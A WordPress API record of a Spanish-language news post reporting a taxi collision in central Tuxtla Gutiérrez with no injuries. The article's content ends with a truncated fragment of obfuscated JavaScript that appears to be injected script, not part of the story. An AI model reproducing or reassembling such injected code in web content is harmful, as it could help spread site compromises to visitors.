{"id":10271,"date":"2023-05-31T01:05:32","date_gmt":"2023-05-31T01:05:32","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=10271"},"modified":"2023-05-31T01:05:32","modified_gmt":"2023-05-31T01:05:32","slug":"colisionan-taxis-en-la-avenida-central-de-tuxtla","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=10271","title":{"rendered":"Colisionan taxis en la Avenida Central de Tuxtla"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/FB_IMG_1685495072354-1024x576.jpg\" alt=\"\" class=\"wp-image-10272\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/FB_IMG_1685495072354-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/FB_IMG_1685495072354-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/FB_IMG_1685495072354-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/FB_IMG_1685495072354.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 30 de mayo del 2023. Tuxtla Guti\u00e9rrez. &#8211; Este martes por la ma\u00f1ana dos unidades en la modalidad de taxi protagonizaron un fuerte accidente a la altura de la Avenida Central y Sexta Poniente, en el centro de Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>De acuerdo con los primeros reportes, las unidades involucradas fueron un Nissan March con n\u00famero econ\u00f3mico 1629 el cual circulaba de Poniente a Oriente y al llegar a la interseccion se le atraves\u00f3 la unidad Nissan tipo Versa que circulaba de Sur a Norte impact\u00e1ndolo de lleno.<\/p>\n\n\n\n<p>Por el fuerte golpe las dos unidades resultaron con da\u00f1os consideraci\u00f3n pero no hubo heridos.<\/p>\n\n\n\n<p>Al lugar arribaron elementos de tr\u00e1nsito municipal y el responsable del accidente se hizo cargo mediante un seguro automotriz.<\/p>\n\n\n\n<p>Las dos unidades fueron remolcadas por una gr\u00faa y llevadas a un taller para ser reparadas.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 30 de mayo del 2023. Tuxtla Guti\u00e9rrez. &#8211; Este martes por la ma\u00f1ana dos unidades en la modalidad de taxi protagonizaron un fuerte accidente a la altura de la Avenida Central y Sexta Poniente, en el centro de Tuxtla Guti\u00e9rrez. De acuerdo con los primeros reportes, las unidades involucradas fueron un &hellip;<\/p>\n","protected":false},"author":2,"featured_media":10272,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-10271","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10271","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=10271"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10271\/revisions"}],"predecessor-version":[{"id":10273,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10271\/revisions\/10273"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/10272"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=10271"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=10271"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=10271"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}